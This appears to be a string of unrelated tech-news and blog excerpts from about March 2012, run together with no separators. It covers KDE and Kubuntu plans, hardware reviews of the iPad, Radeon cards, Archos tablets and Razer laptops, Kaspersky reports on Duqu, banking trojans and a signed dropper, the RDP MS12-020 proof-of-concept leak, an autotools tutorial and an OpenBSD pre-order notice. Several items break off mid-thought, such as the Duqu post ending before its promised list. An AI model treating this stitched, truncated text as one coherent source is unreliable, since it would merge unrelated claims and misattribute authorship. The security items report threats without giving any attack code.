All this just highlights that we've been making free software for users for over 15 years and still haven't got out of the geek market. This comment from mpt, a Canonical designer, highlights some of the reasons why: third party software, marketing to users but importantly to OEMs and their supply chains, online services, an SDK etc.
= So how can KDE remain relevant? =
Better design? This was one of the comments from Ettrich when I first met him at a trade show ages ago. We can call it "usability" but design is a slightly broader term of stepping back and working out why certain tasks are hard to do.
New markets? Aaron and his Make Play Live company are making hardware devices with the Vivaldi tablet; that's exciting, but that's a small company. Canonical is a large company and may well do the same; it will be interesting to see if either works.
Fill in the gaps! There is a common meme that "we've achieved what we wanted 15 years ago"; well, free software in general has, but KDE is really nowhere near a usable desktop. We miss a decent web browser, our office suite is looking promising but still isn't much used, the Plasma media centre has never got past an alpha stage, and Kontact is losing popularity due to a bumpy transition to Akonadi. There's lots to be working on!
App shop? It's what users expect now. Ubuntu has one from Canonical. Muon in Kubuntu is decent and Plasma Active is working on one, but they need to link up to third-party suppliers.
Server! We should be welcoming in OwnCloud and Kolab to the KDE community. So far we've failed to do that.
Modularisation. KDE Frameworks 5 is a great project, it might mean developers like Canonical start picking up bits of KDE technology as well as Qt.
Take advantage of the Qt Project. It's there for the using; it has some bumpy areas in the infrastructure (you can't download a patch without a whole clone) and in its social structures, but we can help them.
= And how can Kubuntu remain relevant? =
Kubuntu has the world's largest Linux desktop rollout. I'll say that again. Kubuntu, often mistaken for a mere derivative of Ubuntu, has more spread than any other desktop Linux. Since I had to announce Canonical moving to focus on Unity I've been contacted by plenty of people saying they rely on Kubuntu. Fortunately Kubuntu isn't going anywhere; that's the advantage of Free Software: when you have a cool community (and we have about the most active community of any part of Ubuntu) then it carries on. We may even find new sponsors.
We like to show KDE at its best. We are the only regularly released distro to ship only KDE Software on the desktop(*); others fill it in with GTK tools or their own config tools, but we want to be all KDE. [For the benefit of those journalists who don't understand 'regularly': we ship every six months, just like KDE SC]
(*)There is one bug in the above, which is that we ship LibreOffice. I think the time is right to move to Calligra; they are doing great stuff and need our support to get it to users. They are also reputed to have better MS Office format importers than LibreOffice thanks to the work of KO.
We must remain part of Ubuntu; they are a great community for distros and we couldn't survive without them. Kubuntu is often incorrectly called a "derivative" of Ubuntu, but we are part of the Ubuntu family and we are one of their flavours, which is just where we should be.
New markets? Kubuntu Active is taking shape. I'd love to have TV friendly media centre support too for example.
But do we need a new name? Kubuntu has never been a great name, it was actually a joke name made up by the original Ubuntu developers for the KDE side. I wonder if a new name would give us a new lease of life like Calligra has. Suggestions welcome :)
We tested the Hive 550W a short while ago, and now Rosewill is following up with their Capstone series, which should be more efficient (80 Plus Gold certification). In this article we will see if the quality of this power supply can match the flawlessness of brands like Seasonic. The Capstone 450W and 650W are little different internally compared to the Hive models. All of the Capstone power supplies are targeted at the high-end market, so our expectations are quite high for this product.
The Capstone series has the goal of delivering performance, quality, and high efficiency; simply put, it's the best solution Rosewill can provide at the moment. The previously tested PSU was made by Sirtec (High Power), but the new models come from a different manufacturer. On the following pages we will show who built these PSUs. Read on to find out how it compares to other offerings.
Just about anyone can put together a solid computer using a decent midtower and the right parts. What we don't see as often is just how fast a computer can be assembled in a small form factor. More and more, too, the term "fast" isn't an all-encompassing one; as the GPU becomes increasingly important, the definition gets foggier and foggier. Today, all of these considerations collide as we test two top end configurations from Puget Systems against each other.
On the outside it looks like we have two systems assembled in Antec's ISK-110 enclosure, but on the inside, we have a showdown between Intel and AMD's best and brightest at 65 watts. The more cynical (and admittedly informed) reader may already have an idea of where this is going, but there are definitely some surprises in store. Read on to find out where each platform performs better, as well as our thoughts on the best use case for each system.
I've been playing with getting Kubuntu Active on ARM. Getting a working ARM setup is a lot like getting a working Linux desktop setup when I started in 1999. It's unclear what computer you need, it's unclear what install image you need, it's unclear how you install it and then it doesn't work and it's unclear how you debug it. For some unknown reason Ubuntu Desktop images from precise don't work on my Pandaboard but from oneiric they do. Ubuntu Server from precise seems to work so I've installed that and installed the Kubuntu Active packages on top of it. Maybe soon we'll have working Kubuntu Active images on ARM.
The application in this photo is Muon Installer QML which is a shiny new app installer being written by Aleix Pol and now available from the new Cyberspace PPA which is going to contain daily builds of various KDE projects.
Weel are ye wordy o'a grace, As lang's my ARM.
Hot on the heels of our Retina Display analysis we have some more data for you: battery life of the new iPad. The chart above is our revamped web browser battery life test that we introduced in Part 2 of our Eee Pad Transformer Prime review. Despite the huge increase in battery capacity, battery life seems to be a bit lower than the iPad 2. The drop isn't huge but it does echo what we've seen in our subjective testing: the new iPad doesn't appear to last as long as the old one.
The drop on LTE is in line with what Apple claims you should expect: about an hour less than on WiFi.
Now for the killer. If you have an iPad on Verizon's LTE network and use it as a personal hotspot (not currently possible on the AT&T version), it will last you roughly 25.3 hours on a single charge. Obviously that's with the display turned off, but with a 42.5Wh battery driving Qualcomm's MDM9600 you get tons of life out of the new iPad as a personal hotspot.
More in our upcoming review...
We're hard at work on our review on the new iPad but with a fair bit of display analysis under our belts I thought a quick post might be in order. One of the major features of the new iPad is its 2048 x 1536 Retina Display. Apple kept the dimensions of the display the same as the previous two iPad models, but doubled the horizontal and vertical resolution resulting in a 4x increase in pixels. As display size remained unchanged, pixel density went through the roof:
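As a quick back-of-the-envelope check (our own figure, assuming the commonly quoted 9.7-inch panel diagonal), the numbers work out as follows:

\[ \text{ppi} = \frac{\sqrt{2048^2 + 1536^2}}{9.7\,\text{in}} = \frac{2560}{9.7} \approx 264, \qquad \text{versus} \qquad \frac{\sqrt{1024^2 + 768^2}}{9.7\,\text{in}} = \frac{1280}{9.7} \approx 132 \text{ on the iPad 2.} \]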
Read on for our analysis of Apple's Retina Display on the new iPad.
Quick update to the Archos news we've had rolling lately. US buyers can now pick up the Archos G9 Turbo line of tablets at their promised 1.5 GHz; the US store is now offering the 8" and 10.1" variants for $269 and $329 respectively, with 8GB of NAND on board. These TI OMAP 4460 powered tablets will be our first chance to see what kind of performance can be wrung out of OMAP 4 when pushed to its fastest clock speed. It will also be interesting to see how this new speed affects battery life. The 101 G9 Turbo is also available for $369 with a 250GB HDD, giving you more media storage than you find on some notebooks these days. The specs on this line are impressive when you consider just how much less these tablets cost than their competition, much of which still doesn't have Android 4.0. We'll have a full review as soon as we can; in the meantime prospective buyers should follow the links to the Archos store.
In my previous blogpost about the Duqu Framework, I described one of the biggest remaining mysteries about Duqu - the oddities of the C&C communications module which appears to have been written in a different language than the rest of the Duqu code. As technical experts, we found this question very interesting and puzzling and we wanted to share it with the community.
The feedback we received exceeded our wildest expectations. We got more than 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used for generating the Duqu Framework code. We would like to say a big ‘Thank you!’ to everyone who participated in this quest to help us identify the mysterious code.
Let us review the most popular suggestions we got from you:
Two weeks ago AMD officially unveiled the Radeon HD 7800 series. Composed of the Radeon HD 7870 GHz Edition and Radeon HD 7850, AMD broke from their earlier protocol with the 7700 and 7900 series and unveiled the cards ahead of their actual launch in order to beat CeBIT and GDC. The result was a pair of impressive – if expensive – cards that cemented AMD’s control of the high-end video card market. Unfortunately because of this early unveiling you couldn’t buy one at the time.
Those two weeks have now come and gone, and the 7800 series has finally been released for sale. Because AMD’s partners have largely passed on AMD’s reference design for the 7870 series we wanted to take a look at what the actual retail cards would be like; with almost everyone using a custom cooler and many partners using factory overclocks, there’s a great deal of variation between cards. To that end HIS and PowerColor have sent over their top 7870 cards, the HIS 7870 IceQ Turbo and the PowerColor PCS+ HD7870. How do these retail cards stack up compared to our reference 7870, and what kind of impact do their factory overclocks bring? Let’s find out.
Sweden recently experienced a large banking scam where over 1.2 million Swedish kronor (about $177,800) were stolen by infecting the computers of multiple victims. The attackers used a Trojan which was sent to the victims and, once installed, allowed the attackers to gain access to the infected computers. Luckily these guys were caught and sentenced to time in jail, but it took a while to investigate since over 10 people were involved in this scam.
It's possible that these attacks are no longer as successful as the bad guys would like, because we are now seeing them use other methods to find and exploit new victims. For quite some time now we have seen how hijacked Facebook accounts have been used to lure the friends of the person whose account has been hijacked into doing everything from clicking on malicious links to transferring money to the cybercriminals’ bank accounts.
Please note that this is not a new scam - it has been out there for quite some time. But what we are now seeing is the use of stolen/hijacked accounts, or fake accounts, becoming very common on Facebook. So common, in fact, that there are companies creating fake accounts and then selling access to them to other cybercriminals. As you might expect, the more friends these accounts have, the more expensive they are, because they can be used to reach more people.
The problem here is not just technical - it’s primarily a social problem. We use Facebook to expand our circle of friends. We can easily have several hundred friends on Facebook, while in real life we may only have 50. This could be a problem because some of the security and privacy settings in Facebook only apply to your interactions with people who you are not friends with. Your friends, on the other hand, have full access to all the information about you.
I’ve recently posted a video titled “Introduction to the autotools (autoconf, automake, and libtool)”. If you develop software, you might find this video useful. So, here’s a little background on it, for those who are interested.
The “autotools” are a set of programs for software developers that include at least autoconf, automake, and libtool. The autotools make it easier to create or distribute source code that (1) portably and automatically builds, (2) follows common build conventions (such as DESTDIR), and (3) provides automated dependency generation if you’re using C or C++. They’re primarily intended for Unix-like systems, but they can be used to build programs for Microsoft Windows too.
The autotools are not the only way to create source code releases that are easily built and packaged. Common and reasonable alternatives, depending on your circumstances, include CMake, Apache Ant, and Apache Maven. But the autotools are one of the most widely-used such tools, especially for programs that use C or C++ (though they’re not limited to that). Even if you choose to not use them for projects you control, if you are a software developer, you are likely to encounter the autotools in programs you use or might want to modify.
Years ago, the autotools were hard for developers to use and they had lousy documentation. The autotools have significantly improved over the years. Unfortunately, there’s a lot of really obsolete documentation, along with a lot of obsolete complaints about autotools, and it’s a little hard to get started with them (in part due to all this obsolete documentation).
So, I have created a little video introduction at http://www.dwheeler.com/autotools that I hope will give people a hand. You can also view the video via YouTube (I had to split it into parts) as Introduction to the autotools, part 1, Introduction to the autotools, part 2, and Introduction to the autotools, part 3.
The entire video was created using free/libre / open source software (FLOSS) tools. I am releasing it in the royalty-free webm video format, under the Creative Commons CC-BY-SA license. I am posting it to my personal site using the HTML5 video tag, which should make it easy to use. Firefox and Chrome users can see it immediately; IE9 users can see it once they install a free webm driver. I tried to make sure that the audio was more than loud enough to hear, the terminal text was large enough to read, and that the quality of both is high; a video that cannot be seen or heard is ridiculous.
This video tutorial emphasizes how to use the various autotools pieces together, instead of treating them as independent components, since that’s how most people will want to use them. I used a combination of slides (with some animations) and the command line to help make it clear. I even walk through some examples, showing how to do some things step by step (including using git with the autotools). This tutorial gives simple quoting rules that will prevent lots of mistakes, explains how to correctly create the “m4” subdirectory (which is recommended but not fully explained in many places), and discusses why and how to use a non-recursive make. It is merely an introduction, but hopefully it will be enough to help people get started if they want to use the autotools.
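To give a flavour of what a setup like this looks like, here is a hypothetical minimal project skeleton (not the exact example from the video) showing the m4 subdirectory, a single non-recursive Makefile.am, and the DESTDIR staged-install convention:

```
# configure.ac
AC_INIT([hello], [1.0])
AC_CONFIG_AUX_DIR([build-aux])
AC_CONFIG_MACRO_DIR([m4])            # the recommended m4/ macro subdirectory
AM_INIT_AUTOMAKE([foreign subdir-objects])
AC_PROG_CC
AC_CONFIG_FILES([Makefile])
AC_OUTPUT

# Makefile.am -- one non-recursive makefile for the whole tree
ACLOCAL_AMFLAGS = -I m4
bin_PROGRAMS    = hello
hello_SOURCES   = src/hello.c

# Typical build, honouring the DESTDIR staged-install convention:
#   autoreconf --install
#   ./configure --prefix=/usr/local
#   make
#   make DESTDIR=/tmp/stage install
```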
Though AMD announced the Radeon HD 7800 series nearly two weeks ago, it won’t be until Monday that the cards officially go on sale. While we’re still at work on our full launch article, our first retail card, PowerColor’s PCS+ HD7870, recently arrived and we’ve just finished putting it through its paces.
The PCS+ HD7870 is fairly typical of what will be launching; it’s a factory overclocked card with a heatpipe based open air cooler. PowerColor has pushed the card to 1100MHz core, 4.9GHz memory, representing a 100MHz (10%) overclock and a much more mild 100MHz (2%) memory overclock. Given the very high overclockability we’ve seen in the entire Radeon HD 7000 series, PowerColor is one of the partners looking to take advantage of that headroom to stand out from the pack.
We’ll have the full details on Monday, but for the time being we wanted to share a couple of numbers.
Compared to the reference 7870, the PCS+ HD7870 is faster and quieter at the same time, the latter of which is largely a result of PowerColor using an open air cooler as opposed to a blower as in AMD’s reference design. The 100MHz overclock adds a fair bit of performance to the PCS+ 7870, and for AMD’s partners this is a big deal as it allows them to put more space between their factory overclocked models and stock models than they could with the less overclockable 6000 series.
As far as construction goes the PCS+ 7870 is a rather typical semi-custom 7870. PowerColor is using AMD’s PCB along with their own aluminum heatpipe cooler. As we speculated in our 7870 review, partners are using the second DVI header on the PCB, with PowerColor using a stacked DVI design here to offer a second SL-DVI port.
Finally, how’s overclocking? We hit 1150MHz core on our reference 7870. With PowerColor already binning chips for their PCS+ 7870 we landed a chip that could do a full 1200MHz, a full 20% over the reference 7870 and 9% over PowerColor’s factory overclock. And like the reference 7870 this is all on stock voltage – we haven’t even touched overvolting yet.
But what does 1200MHz do for a 7870? For that you’ll just have to check in on Monday when we look at our full collection of retail Radeon HD 7870 cards.
Rosewill sent us their newest model Hive with 550W. The rated power makes these models good for most common GPUs as well as powerful CPUs. Features such as 80 Plus Bronze certification and modular cables are quite common these days, but such characteristics say little about how good a PSU really is. What about the internal design and components for example? Who built this PSU? On the following pages we will meet an old acquaintance with a new look and see if it's capable of keeping pace with the times.
Apple's A5X SoC
Today has been pretty exciting. Not only did we confirm the die size of Apple's A5X SoC (162.94mm^2) but we also found out that it's still built on Samsung's 45nm LP process. Now, courtesy of UBM TechInsights, we have the first annotated floorplan of the A5X (pictured above).
You can see the two CPU cores (ARM Cortex A9s) as well as the additional two GPU cores (PowerVR SGX543MP4) compared to the A5 (pictured below). Note the increase in DDR interfaces, although it's unclear whether we're looking at 4x16 or 4x32-bit interfaces. It's quite possible that it's the former. Also note that Apple has moved the DDR interfaces next to the GPU cores, compared to the CPU-adjacent design in the A5. It's clear who is the biggest bandwidth consumer in this chip.
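As a rough back-of-the-envelope comparison (assuming LPDDR2-800, as in the A5; that is our assumption, not a confirmed figure), the two possibilities would work out to:

\[ 4 \times 16\text{-bit} = 64\text{-bit}: \; \tfrac{64}{8} \times 800\,\text{MT/s} = 6.4\,\text{GB/s}, \qquad 4 \times 32\text{-bit} = 128\text{-bit}: \; \tfrac{128}{8} \times 800\,\text{MT/s} = 12.8\,\text{GB/s}. \]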
Contrary to what we thought yesterday based on visual estimation of the A5X die, Chipworks has (presumably) measured the actual die itself: 162.94mm^2. While the A5 was big, this is absolutely huge for a mobile SoC. The table below puts it in perspective.
CPU Specification Comparison
CPU | Manufacturing Process | Cores | Transistor Count | Die Size
Apple A5X | 45nm? | 2 | ? | 163mm^2
Apple A5 | 45nm | 2 | ? | 122mm^2
Intel Sandy Bridge 4C | 32nm | 4 | 995M | 216mm^2
Intel Sandy Bridge 2C (GT1) | 32nm | 2 | 504M | 131mm^2
Intel Sandy Bridge 2C (GT2) | 32nm | 2 | 624M | 149mm^2
NVIDIA Tegra 3 | 40nm | 4+1 | ? | ~80mm^2
NVIDIA Tegra 2 | 40nm | 2 | ? | 49mm^2
The Twitter infosec sphere last night and the blogosphere this morning are in a bit of a frenzy about the public leak of a DoS PoC targeting CVE-2012-0002, the RDP pre-auth remote. This vulnerability was highlighted in our previous Securelist post on this month's Patch Tuesday, "Patch Tuesday March 2012 - Remote Desktop Pre-Auth Ring0 Use-After-Free RCE!". First off, patch now. Now. If you can't, use the mitigation tool that Microsoft is offering - the tradeoff between requiring network authentication and the fairly high risk of RCE in the next couple of weeks is worth it. You can see the list of related links on the side of this page; one was included for MS12-020.
Some interesting additional information has surfaced about the vulnerability, including the fact that the bug was found in May of 2011 and "reported to Microsoft by ZDI/TippingPoint in August 2011". The researcher, Luigi Auriemma, says that this work wasn't disclosed by him (often, he fully discloses his work). After some careful investigation of the poorly coded "rdpclient.exe" posted online in Chinese forums, he found that it was a cheap replica of the unique code he provided to ZDI and in turn, Microsoft, when privately reporting the bug. This is bad. And already, researchers with connections to Metasploit open source exploit dev like Joshua Drake are tightening up the code, developing and sharing improved PoC. As Microsoft pointed out, confidence in the development of a reliable public exploit within 30 days is very high.
Regardless, the implications of a leak in the highly valuable MAPP program could hinder strong and important security efforts that have been built on years of large financial investment, integrity, and maturing operational and development processes. Thoughts and opinions on the leak itself can be found over at Zero Day. At the same time, I think that this event may turn out to be nothing more than a ding in the MAPP program's reputation, but it's important that this one is identified and handled properly. With the expansion of the program, an event like this one is something that certainly should have been planned for.
UPDATE: Early this afternoon over at the MSRC blog, Microsoft acknowledges that the PoC leaked on Chinese forums "appears to match the vulnerability information shared with MAPP partners", note that an RCE exploit is not publicly circulating just yet, advises patching or mitigating with the Fix-It, and initiates investigation into the disclosure.
UK readers have one more thing to lord over their colonial cousins. Starting today, Archos has made available the long promised Archos 80 G9 Turbo in its full 1.5 GHz glory. Positioned as relative bargains in the Android tablet space, the updated slate can be bought from the UK Archos Store for £199.98 or £239.99, in 8 GB and 16 GB models, respectively. The updated line is shipping with Ice Cream Sandwich on board, so no firmware updates when you open the box.
As a refresher, we've been reporting on the Archos G9 line for quite a while. Originally announced as the fastest Android tablets in the world, they hadn't until now hit their top speeds on all models. With a TI OMAP 4460 tuned to 1.2 GHz, Archos released the first round of Turbo models in late 2011. These tablets matched the Galaxy Nexus in specs, but were still 20% below the promise. With whatever hurdles finally overcome, we're excited to explore the performance of a full-speed OMAP 4460, particularly its PowerVR SGX540, which should be clocked at 384 MHz, trumping the GN's 304 MHz. Alas, this release seems to be UK and Europe only. With US pricing expected to hover around $300, we're eagerly awaiting a US release.
In early March, we received a report from an independent researcher on mass infections of computers on a corporate network after users had visited a number of well-known Russian online information resources. The symptoms were the same in each case: the computer sent several network requests to third-party resources, after which, in some cases, several encrypted files appeared on the hard drive.
The infection mechanism used by this malware proved to be very difficult to identify. The websites used to spread the infection are hosted on different platforms and have different architectures. None of our attempts to reproduce the infections were successful. A quick analysis of KSN statistics that might help to identify the connection between compromised resources and the malicious code being distributed did not yield any results, either. However, we did manage to find something that the news sites had in common.
While Google is obviously trying to create a safer environment in regard to the Android operating system, some of these changes are leaving me a bit confused. I recently discovered some interesting behavior in regard to the default email client in 4.0 Ice Cream Sandwich.
It seems that if you try to download or open a zip file attachment from within the email client, Google warns of the possibility of malware:
The long road to Android 4.0 for US subscribers seems to be getting shorter; and for some lucky users the time has come. AT&T's HTC Vivid was one of their first LTE devices, and made the list of HTC devices that would be receiving Ice Cream Sandwich. Typically these OTA updates are pushed after extensive testing and to a handful of devices at first. However, as first reported on Android Central, some owners were able to pull the update by dialing *#*#682#*#*. The update includes HTC's updated Sense 3.6 skin, which seems a little less intrusive than their prior iterations and does open up its Beats Audio feature to third party applications for the first time.
As a Gingerbread device the Vivid's no slouch; featuring Qualcomm's S3 APQ8060 (1.2 GHz dual-core Snapdragon) paired with the MDM9600 for connectivity, and 1GB of RAM, its performance was on par with other phones of that generation. With this update we will have our first chance to directly compare performance on ICS between two similar SoCs (TI's OMAP 4xxx and Qualcomm's S3). No doubt a lot of time has been spent by both Qualcomm and HTC in optimizing the build for the hardware, and hopefully that work will be pushed to more AT&T users in the coming weeks.
Interested Vivid owners should try the update code; users on XDA are reporting varying success. If your phone updates, please post performance results as you get them. We'll update the post if we learn more.
Almost 15 years ago I set up my first multiple monitor system, using a 17” and a 15” CRT. At that time it was a very uncommon setup, but now it seems that many people use multiple displays to manage their workspace. No matter how many displays you hook up, there are always some things that benefit from having a single, large, high resolution desktop, such as the spreadsheets that I use for doing display reviews.
27” and 30” displays with 2560 horizontal pixels have been available for a few years now, though the pricing on them has been very high that whole time. Sometimes you can find a display on sale and pick it up for a reasonable price, but typically the cost of entry seems to be right around $1,000 and up. Because of this people are still likely to buy two, or even three, 1920x1200 displays for the same price and run a multi-monitor desktop.
We finally have our first real affordable 27”, high resolution display on the market now, and it comes courtesy of HP. The HP ZR2740w is a 27” IPS panel with 2560x1440 resolution (16:9 aspect ratio) and an LED backlighting system. With a street price that comes in at $700 or below, what has HP done to be able to bring a high resolution display to the masses at a price well below other vendors? Thankfully, they provided me with a unit so I could evaluate it and see.
Over the last few years of smartphone ownership, one of the most satisfying and somewhat surprising uses has been listening to good old fashioned FM radio, streamed over the internet to my phone. Phones aren't ideal for this, certainly. Phone speakers are tolerable at best for music, and often not loud enough to fill a room. And streaming, especially in WiFi dead spots around your house, can deplete your phone's battery quickly. And yet, dedicated internet radio devices have remained a bit of a niche, and a niche often reserved for those with money to spare. The earliest internet radio device, the Kerbango, was a $300 flop, whose legacy (if not looks) and price carry on with Tivoli Audio’s Networks internet radio. And though cheaper devices have rolled out, including Logitech’s Squeezebox, the prospect of buying a device solely dedicated to streaming internet radio limits the appeal to buyers.
Archos, no stranger to undercutting on price and focusing on media playback, introduced their Archos 35 Home Connect last year, to compete in this space by leveraging Android to bring more than just internet radio to your home. Priced at $130, Archos has basically taken 2010-era smartphone internals (TI's OMAP 3630, indeed) and strapped them to a pair of speakers and a 3.5” screen. Does this repurposing of Android make for a compelling buy? Let’s find out.
The design of the Home Connect is simple, if a little bland. The 3.5” screen is centered on the device and flanked by the speakers. The traditional Android controls (back, menu, search and home) are joined by volume controls as soft buttons just below the screen. A VGA front-facing camera sits just above the screen, and around back we find a microSD slot, micro USB port (for power and PC-connection), 3.5 mm headphone jack and a power button. The casing is glossy, grey plastic and though there’s a certain heft to the device, this doesn’t feel like a device that would survive a terribly large fall.
The display uses a TFT panel, which is lacking in both resolution and image quality. At 480x272, and producing washed-out colors and blacks not much darker than the case, you probably won't watch a lot of video on this screen, despite Archos' typical dedication to including extensive video codec and container support. More frustrating than the display is the touchscreen layer. I’ve never met a resistive touchscreen I’ve liked, and though this one is no more offensive than any other, it’s still the most frustrating aspect of the Home Connect. Key presses are often missed and swipe gestures are an exercise in frustration. Some hardware buttons could have gone a long way toward remedying the problem, particularly if a directional pad were included. Better still, swapping the resistive layer for a capacitive one would be like manna from heaven.
Though they tout the nearly limitless number of internet radio streams available, Archos doesn’t advertise this simply as an internet radio. Leveraging Android as the operating system means that the device is as versatile as the apps you can install (on Android 2.2, at least). Pre-installed apps are mainly media-centric, though Tango is included for video calling. Angry Birds is the only truly surprising inclusion; if scrolling on a resistive screen is difficult, gaming is torturous. To download new apps, users turn to a special version of AppsLib, whose catalog is broad but unimpressive. The top free app is a Google Apps installer that grants the device Market access, a suitable testament to AppsLib’s selection. With Market installed, the limiting factor is that resistive screen. Media streaming apps (Netflix, Pandora, etc.) work well, though inputting usernames and passwords is challenging. Productivity and messaging apps are made almost unusable by the touchscreen, but then you probably have a phone, tablet or PC nearby for that. There’s just no getting around it: Android notwithstanding, this is a streaming device first and foremost.
The pre-installed internet radio app is one of the best, Tune-In Radio Pro. The parent company, RadioTime, first developed an engine for aggregating internet radio streams in 2003, and it is put to use in Logitech’s Squeezebox and other streaming devices. The Tune-In Radio app was introduced in 2008, and after a few years has matured into a feature-rich, stable service with apps on iOS, Android, BlackBerry and Windows Phone devices. The “Pro” edition of the app caches content, allowing users to pause and time-shift streams. It’s not quite Tivo-esque since there’s no facility for scheduling recordings, but it's a nifty feature for live content, or for playing back a song. Users can easily search for streams based on genre, location or name. Station and track data is updated on screen, on streams where it’s available, and the interface is easy to use, if a little drab.
So, we’ve settled on this as a media playback device; how does it do? Tivoli’s speakers are all high-end components designed to match their top-dollar price. These . . . are not. That’s not to say they’re without merit. Indeed, if you’re used to listening to music through your phone’s speaker, this is much better. Stereo separation isn’t huge, but volume is much better and the range is sufficient for internet audio streams. As a frequent NPR listener, I find the speakers perfect for the spoken voice, with a broad resonance that gives voices a fullness that a small phone speaker fails to deliver. Music doesn’t have the impact that a set of larger speakers and a separate subwoofer would provide, but there’s much more bass available than on your phone. Sound is mostly distortion-free as you raise the volume, though I suspect the speakers could be driven louder and Archos simply set 100% to be well within the speakers' capabilities. Audio, then, is great for an Android device, but won’t wow those who’ve bought anything from B&O.
Though the typical use case is as a plugged-in device, the Home Connect does have a battery, so it can be carried around untethered (but within range of your wireless network). Battery life while streaming isn’t quite all-day, figuring closer to four hours than eight, but if you’re around the house you’re probably not too far from a microUSB charger no matter what room you’re in. WiFi range is as good around my house as with any other WiFi connected device, though the thick walls of this old house make horizontal penetration much worse than vertical. Though 802.11 a/b/g/n is offered, users are limited to the 2.4 GHz band, making it vital to position it farther from your microwave for kitchen use.
With the 35 Home Connect, Archos tries to answer the question, "Is Android a good platform for an internet appliance?" Past internet appliance efforts (the Chumby among them) have found little traction, while streaming audio devices have been hampered by their limited abilities and high cost. While the 35 Home Connect acquits itself well as an audio streamer, it falls short as a broader internet appliance. The display is adequate, and the Android build is stable and effective. But a resistive touchscreen makes the experience less than stellar. Being able to expand services by adding apps (like Spotify) makes this device competitive with other devices at the same price point. But there’s just no getting around the fact that Android is a touch interface, and if touch response is lacking, the experience just won’t cut it. That said, I love the idea of the Home Connect and hope Archos (and others) continue to refine the genre. Give the same device an OLED screen and capacitive touch, and you have a real winner.
{Ed. note: We've foregone presenting our usual testing data because of the nature of this product. If you're a developer or just curious, feel free to e-mail me at the by-line link and I'd be glad to share.}
iFixit saved us all a whole lot of trouble and performed a teardown of the new iPad announced last week. The internals were mostly what we expected, down to the Qualcomm MDM9600 LTE baseband. Despite many of the new iPad's specs being a known quantity prior to launch, there were a few surprises in the teardown.
The first Ubuntu flavour for tablets is now making daily builds. We even got our first bug reports from our lovely Plasma Active upstreams. Images are for i386 only for now; ARMv7 should be added when we know it's a bit more stable and have testers.
The logo above is only an idea, it's the extent of my SVG skills. I also updated the blogs.kde.org poll :)
After a few delays and many recitations of Blizzard's "We'll release it when it's ready" mantra, Diablo III finally has a release date: May 15th. On that date, Blizzard's click-heavy action RPG will be available on PC and Mac for $59.99 USD in almost every region. Latin American and Russian players will need to wait until June 7th.
Digital presales for Diablo III start today; World of Warcraft players interested in picking up a free copy may still do so by purchasing a WoW Annual Pass before May 1st.
For interested parties, Blizzard will also be selling a Diablo III Collector’s Edition for $99.99. The retail exclusive package includes a behind-the-scenes Blu-ray/DVD set, a soundtrack CD, a 208-page art book, and a 4GB USB trinket carrying full versions of Diablo II and Diablo II: Lord of Destruction. It will also come with exclusive content for Diablo III, World of Warcraft, and Starcraft II: Wings of Liberty – most likely in-game items along the lines of a WoW minipet.
The press release touts Diablo III’s real money auction house and robust Battle.net-based matchmaking, yet it makes no mention of the planned player-versus-player arena. This is likely because Diablo III will be launching without it. “The PvP game and systems aren’t yet living up to our standards,” Blizzard’s Jay Wilson wrote on Battle.net last week. “After a lot of consideration and discussion, we ultimately felt that delaying the whole game purely for PvP would just be punishing to everyone who’s waiting to enjoy the campaign and core solo/co-op content.”
Source: Blizzard
Post was updated 19.03.2012 (see below)
In the last few days a malicious program has been discovered with a valid signature. The malware is a 32- or 64-bit dropper that is detected by Kaspersky Lab as Trojan-Dropper.Win32.Mediyes or Trojan-Dropper.Win64.Mediyes respectively.
Numerous dropper files have been identified that were signed on various dates between December 2011 and 7 March 2012. In all those cases a certificate was used that was issued for the Swiss company Conpavi AG. The company is known to work with Swiss government agencies such as municipalities and cantons.
Information about the Trojan-Dropper.Win32.Mediyes digital signature
Razer is, first and foremost, a gaming company. From the company slogan (“By gamers, for gamers”), to partnerships with a number of the most popular game development studios, even the job title on the CEO’s business card (it reads Chief Gamer), nothing about Razer is shy about who the target market is. But it’s key to note that Razer is a gaming company which has focused on gaming-related peripherals and accessories—mice, keyboards, headsets, controllers, and limited edition peripherals for specific games. But that all changes as of now.
The vessel of change in question: Razer’s new Blade, a 17” gaming laptop that bucks almost all of the common trends in gaming-focused desktop replacements. Heralded by Razer as the “World’s First True Gaming Laptop”, the Blade packs a 2.8GHz Core i7-2640M, NVIDIA’s GT 555M dGPU, 8GB of memory, a 256GB SSD, and a 17.3” 1080p display into an enclosure that’s just 0.88” thick and weighs 6.4lbs. If Intel were to extend the ultrabook hardware guidelines out to 17” notebooks, the Blade would hit them pretty dead on. It’s pretty clear right off the bat that Razer wasn’t aiming at the gargantuan six-core SLI notebooks out there—in fact, on paper the Blade looks a bit like the Windows answer to the 17” MacBook Pro.
This isn’t the first time that Razer has shown intent to play in the gaming hardware space, having shown off the impressive Switchblade concept system at CES 2011. The Switchblade design concept clearly had a major influence on the Blade as is evident from the Switchblade UI panel on the side of the keyboard, but what’s important to note with the Blade is that it shows just how serious Razer is about transitioning into PC hardware and gaming systems. Read on to see how it fared.
Boutique gaming desktops are nothing new around here; while enthusiasts may readily dismiss them, it's easy to forget they do serve a purpose and a market beyond the do-it-yourself crowd. There are certain things even a lot of enthusiasts, myself included, aren't able to do that boutiques can; specifically, assembling custom liquid cooling loops. The last one of these we saw was Puget Systems' Deluge, a behemoth of a machine that retailed for more than seven grand.
Today iBUYPOWER is making available a system with many of those same perks at a fraction of the cost. The Erebus GT uses an entirely custom enclosure, has a laser-etched panel window with white LED lighting, and most importantly includes a custom liquid loop attached to a massive top-mounted radiator that cools the CPU and GPU. Can iBUYPOWER deliver a truly compelling boutique build at a reasonable price without cutting any corners? Let's find out.
Date: Tue, 13 Mar 2012 20:47:24
From: Theo de Raadt
To: announce@cvs.openbsd.org
Subject: pre-orders activate for OpenBSD 5.1

It is that time again. I have just activated pre-orders for CDs, tshirts, and posters for the 5.1 release -- due May 1.

http://openbsd.org/orders.html

At the same time, I am making available the song that will come out with the release (hmm, it is still moving out to the ftp mirrors at the moment, but that is ok). The song and details of it are linked from:

http://openbsd.org/lyrics.html
And this time there's even more goodies available for you to grab for your collection.
Read more...
Patch Tuesday March 2012 fixes a set of vulnerabilities in Microsoft technologies. Interesting fixes rolled out will patch a particularly problematic pre-authentication ring0 use-after-free and a DoS flaw in Remote Desktop, a DoS flaw in Microsoft DNS Server, and several less critical local EoP vulnerabilities.
